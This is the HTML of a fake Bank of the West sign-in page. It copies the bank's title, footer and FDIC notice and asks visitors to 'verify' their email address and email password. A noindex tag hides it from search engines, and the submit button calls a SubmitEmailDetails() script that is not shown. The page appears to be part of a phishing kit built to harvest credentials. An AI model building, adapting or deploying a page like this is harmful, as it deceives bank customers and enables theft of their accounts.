<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="robots" content="noindex">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="./css/app.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css"
        integrity="sha512-KfkfwYDsLkIlwQp6LFnl8zNdLGxu9YAA1QvwINks4PhcElQSvqcyVLLD9aMhXd13uQjoXtEKNosOWaZqXgel0g=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
    <script type="text/javascript" src="./js/app.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/js/all.min.js"
        integrity="sha512-6PM0qYu5KExuNcKt5bURAoT6KCThUmHRewN3zUFNaoI6Di7XJPTMoT6K0nsagZKk2OB4L7E3q1uQKHNHd4stIQ=="
        crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <title>Sign In to Access Your Accounts - Bank of the West</title>
</head>

<body>
    <header>
        <img src="" />
    </header>
    <main>
        <div class="signinhead">
            <p> Verify Your Email Access Your Accounts </p>
        </div>
        <div class="loginForm">
            <form autocomplete="off">
                <label> Email Address </label>
                <input type="text" id="userMail" autocomplete="organization" />
                <label> Email Password </label>
                <input type="password" id="userPass" autocomplete="off" />
                <button type="button" onclick="SubmitEmailDetails()" id="submitBtn"> SIGN IN </button>
                <!-- <p> New? <a href="">Sign up for online account access ></a> </p> -->
            </form>
        </div>
    </main>
    <footer>
        <div class="footerLinks">
            About Us . Contact Us . Locations . Terms of Use . Privacy . Security Center . Service Agreement
        </div>
        <div class="footerSocials">
            <i class="fab fa-facebook"></i>
            <i class="fab fa-twitter"></i>
            <i class="fab fa-youtube"></i>
            <i class="fab fa-linkedin"></i>
            <i class="fab fa-medium"></i>
            <i class="fab fa-instagram"></i>
        </div>
        <div class="footerCopy">
            <p> &copy; 2022 Bank of the West. </p>
            <p>Member FDIC. Equal Housing Lender </p>
            <p>In South Dakota, Bank of the West operates under the name Bank of the West California.</p>
        </div>
    </footer>
</body>

</html>